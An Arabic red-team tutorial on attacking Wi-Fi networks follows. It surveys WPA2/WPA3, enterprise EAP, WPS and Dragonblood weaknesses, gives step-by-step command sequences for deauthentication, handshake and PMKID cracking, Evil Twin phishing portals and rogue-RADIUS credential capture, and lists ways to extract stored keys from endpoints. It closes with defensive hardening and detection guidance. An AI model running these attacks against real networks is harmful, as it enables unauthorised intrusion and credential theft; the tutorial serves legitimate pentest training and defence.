الفرق الحمراء — الهجومخبير100mL41

تحليل معمق لأمن الواي فاي وكسر الحماية

تجاوز حمايات WPA2/WPA3 والشبكات المؤسسية

#Wi-Fi#WPA3#PMKID#Evil Twin#EAP

مقدمة — لماذا الـ Wi-Fi خاص؟

تشبيه — شرح مبسط

الكابل النحاسي مثل أنبوب يحمل ماءً: لا يصل إليه إلا من يفتح الجدار. الـ Wi-Fi مثل ضباب يخرج من النافذة — كل من في الشارع، السيارة، الشقة المجاورة، يستنشقه. التشفير ليس "حماية إضافية"، بل هو الحاجز الوحيد بين بياناتك و أي شخص يحمل هوائياً بـ 30 دولار.

تنبيه قانوني — استخدام مصرح به فقط

كل تقنية أدناه شرعية في مختبرك الخاص أو ضمن نطاق pentest موقّع. مهاجمة شبكة جارك أو مقهى أو شركة دون إذن مكتوب = جريمة بموجب أنظمة مكافحة الجرائم المعلوماتية، حتى لو لم تسرق شيئاً.

أنواع شبكات Wi-Fi و حالة كل واحدة في 2026

WEP (1999)

RC4 + IV قصيرة (24-bit). مكسور تماماً — يُكسر في أقل من 5 دقائق بأي بطاقة monitor mode.

يظهر اليوم فقط في طابعات قديمة، أجهزة ICS، أو أجهزة غير محدثة. وجوده وحده مؤشر سوء صيانة.

WPA / TKIP (2003)

ترقيع لـ WEP. مكسور عبر هجوم Beck-Tews / chopchop. لا يُستخدم اليوم إلا بالخطأ.

WPA2-PSK / AES-CCMP (2004)

القياسي العام لعقدين. آمن من حيث الخوارزمية، هشّ من حيث كلمة السر. كل الهجمات الحقيقية = كسر offline لـ handshake.

قابل لـ KRACK (2017) — معالَج بترقيعات client. PMKID attack (2018) — لا يحتاج client.

WPA2-Enterprise (EAP)

RADIUS + شهادة. أقوى لكن التهيئة الخاطئة قاتلة: عميل لا يفحص شهادة الخادم → Evil Twin يأخذ NetNTLM/MSCHAPv2 hashes.

WPA3-Personal / SAE (2018)

Dragonfly handshake — يمنع الكسر offline نظرياً. كل محاولة تتطلب تفاعل مع AP حقيقي → forward secrecy.

ضربته ثغرات Dragonblood (CVE-2019-9494/9496) في الـ side-channel و downgrade. الترقيعات الحديثة أقفلت معظمها.

WPA3-Enterprise + 192-bit suite

للقطاعات الحكومية/المالية. Suite-B + ECDH P-384 + AES-GCMP-256. لا توجد هجمات عملية معروفة على الخوارزمية ذاتها — فقط على التهيئة و البشر.

OWE (Opportunistic Wireless Encryption)

بديل آمن للـ Open networks في المقاهي. تشفير بدون كلمة سر عبر Diffie-Hellman. لا يحمي من Evil Twin لأن لا مصادقة للـ AP.

WPS (PIN)

زر أو PIN مكوّن من 8 أرقام للاتصال السريع. كسره في ساعات عبر Pixie Dust أو brute-force على الـ PIN. عطّله دائماً.

عتاد المهاجم — ما تحتاجه فعلاً

بطاقة تدعم monitor mode + packet injection: Alfa AWUS036ACM (chipset MT7612U)، AWUS036ACH (RTL8812AU)، Panda PAU09.
هوائي اتجاهي (Yagi 16dBi) لمسافات بعيدة، أو omni لمسح متعدد.
SDR اختياري (HackRF, BladeRF) لتحليل أعمق و هجمات مخصصة.
GPU للـ cracking: hashcat على RTX 4090 يكسر ~3M H/s لـ WPA2.
Pwnagotchi / WiFi Pineapple لجمع handshakes و إدارة AP خبيث.

bash

# تأكد البطاقة تدعم monitor + injection
iw list | grep -A 8 "Supported interface modes"
aireplay-ng --test wlan0mon

هجمات قابلة للتنفيذ اليوم — الخطوات

1) WPA2-PSK — handshake offline

bash

airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
# في terminal آخر — إجبار client على إعادة الاتصال
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# تحويل و كسر
hcxpcapngtool -o cap.hc22000 cap-01.cap
hashcat -m 22000 cap.hc22000 rockyou.txt -r best64.rule

2) PMKID — بدون client

bash

hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
hashcat -m 22000 pmkid.hc22000 wordlist.txt

يستهدف routers تنشر PMKID في أول EAPOL-frame. كثير منها معطّل اليوم لكن لا يزال يعمل ضد عتاد قديم.

3) Evil Twin + Captive Portal

bash

# AP مزيف بنفس SSID + إشارة أقوى + de-auth للـ AP الأصلي
airgeddon   # tui يقود السيناريو كاملاً
# أو يدوياً:
hostapd-mana hostapd.conf
dnsmasq -C dnsmasq.conf
# صفحة تطلب "إعادة إدخال كلمة سر Wi-Fi" — ضحايا غير تقنيين

4) WPA2-Enterprise — سرقة hashes

bash

# eaphammer ينشئ RADIUS مزيف
./eaphammer -i wlan0 --essid CORP-WIFI --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds
# يلتقط MSCHAPv2 challenge/response
# ثم asleap أو hashcat -m 5500
hashcat -m 5500 ntlm.hash rockyou.txt

يعمل فقط لو client لا يفحص شهادة الـ RADIUS — وهي التهيئة الافتراضية في معظم الشبكات.

5) WPS — Pixie Dust

bash

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# أو
bully -b AA:BB:CC:DD:EE:FF -d wlan0mon

6) WPA3 — downgrade & Dragonblood

bash

# لو الشبكة "transition mode" (WPA2/WPA3 معاً)
# أنشئ AP مزيف يدعم WPA2 فقط بنفس SSID → client يقع
# Dragonblood side-channel:
git clone https://github.com/vanhoefm/dragonblood
python dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF

معظم الـ APs الحديثة رقّعت Dragonblood، لكن transition mode يبقى نقطة ضعف تصميمية.

ما لا يُكسر اليوم — حدود الواقع

لا يوجد طريق سحري

WPA3-SAE بكلمة سر طويلة (≥20 رمز عشوائي) — لا يمكن كسرها offline أصلاً (التصميم يمنع ذلك). الهجوم online ضد AP محدود السرعة → غير عملي.
WPA3-Enterprise 192-bit + شهادات client صحيحة (EAP-TLS) — لا توجد هجمات عملية معروفة. السرقة تكون من الـ endpoint لا من الراديو.
Wi-Fi 7 / 802.11be Protected Management Frames إجباري — يمنع de-auth الكلاسيكي → هجمات الـ handshake forced re-association لا تعمل.
RADIUS مع validated server certificate + identity hiding — Evil Twin يفشل لأن client يرفض الـ cert.
AES-GCMP-256 — لا يوجد كسر cryptographic معروف. كل الهجمات على الـ ecosystem المحيط.

طرق خفية / غير مباشرة (Workarounds)

عندما لا يمكن كسر الـ Wi-Fi مباشرة

المهاجم المحترف لا يضرب الجدار — يلفّ حوله. هذه الطرق التي تستخدمها مجموعات APT عندما يفشل الكسر المباشر:

هجوم BSSID Spoofing على الـ Probe Requests: الجهاز يبثّ باستمرار أسماء الشبكات التي يحفظها (PNL). استخدم Karma/MANA للرد بـ "نعم أنا تلك الشبكة" → يتصل تلقائياً.
سرقة الـ Pre-Shared Key من نقطة النهاية: على Windows في netsh wlan show profile name="X" key=clear؛ على Android من ملف /data/misc/wifi/WifiConfigStore.xml بصلاحية root.
هجوم سلسلة التوريد على الـ Router: استغلال CVE في firmware (Asus, TP-Link, Netgear) للوصول لـ admin ثم استخراج PSK من /etc/config/wireless.
Side-channel عبر الجدار: تحليل قوة الإشارة و توقيت الحزم يكشف نشاط بشري داخل المبنى — مفيد للـ reconnaissance قبل الاقتحام الفعلي.
RogueAP بمسمى GuestWiFi/Free-WiFi قرب الهدف: لا يحتاج اختراق شبكتهم — يكفي أن موظفاً واحداً يتصل بهاتفه و تخترق ذلك الهاتف، ثم تنتقل عبر VPN الشركة.
Bluetooth/UWB كقناة جانبية: نفس الجهاز يبثّ Bluetooth أيضاً. ثغرات BlueBorne / KNOB تعطي pivot دون لمس Wi-Fi.
هجمات Layer-2 بعد الانضمام كضيف: شبكات Wi-Fi كثيرة تفصل Guest/Corp بـ VLAN ضعيفة. yersinia + VLAN hopping + ARP spoofing داخل Guest قد تصل للـ Corp.
سرقة EAP credentials عبر phishing بريد قبل الوصول للموقع: سرقة username/password ثم الاتصال بـ Enterprise Wi-Fi شرعياً من الموقف خارج المبنى.
FragAttacks (CVE-2020-24588 و رفاقها): عيوب تصميم في 802.11 تسمح بحقن plaintext frames في شبكات مشفّرة. ترقّع تدريجياً لكن لا تزال تعمل ضد عتاد قديم.
هجوم الـ "Captive Portal Cookie": شبكات الفنادق و المطارات تعتمد cookie للسماح بالخروج. سرقتها من ضحية متصلة → دخول مباشر دون كلمة سر.

الدفاع — كيف تجعل شبكتك ضمن «ما لا يُكسر»

تهيئة دفاعية مرجعية

WPA3-only (لا transition mode) أو WPA3-Enterprise + EAP-TLS لشبكات الموظفين.
Protected Management Frames إجباري (PMF required) — يقتل de-auth و disassoc spoofing.
كلمات سر ≥20 حرف عشوائي أو passphrase من ≥6 كلمات. لا تعتمد على complexity vs length.
عطّل WPS كلياً. لا استثناءات.
عطّل PMKID broadcast على الـ APs التي تدعم تعطيله.
RADIUS مع شهادة internal CA + إجبار client على فحص الشهادة (Group Policy على Windows، Profile على iOS/Android، NetworkManager على Linux).
اعزل Guest Wi-Fi في VLAN منفصل بـ ACL صريح يمنع كل الـ corp ranges.
WIDS/WIPS (Aruba, Cisco, Mist) لرصد APs مزيفة و de-auth floods.
تخفيض إشارة قصداً عند حدود المبنى — اضبط TX power بحيث لا تخرج للشارع.
MFA على كل خدمة داخلية — حتى لو كُسر الـ Wi-Fi لا يكفي للوصول للموارد.

مؤشرات Wi-Fi WIDS العملية

BSSID جديد ينشر نفس SSID — Evil Twin محتمل.
de-auth floods من client/AP غير مسجل.
RADIUS authentication failures من الـ same MAC بأنماط dictionary.
probe responses من APs لـ SSIDs غير معدّة في الموقع.
إشارة قوية بشكل غير معتاد من زاوية معينة من المبنى.

مصادر و قراءات

Mathy Vanhoef — KRACK, Dragonblood, FragAttacks papers.
Wi-Fi Alliance — WPA3 Specification.
NIST SP 800-153 — Wireless LAN Security Guidelines.
Aircrack-ng / hashcat / hcxtools docs.

الويب من منظور الفريق الأحمر — استغلال متعمّق

سلاسل هجوم AWS الواقعية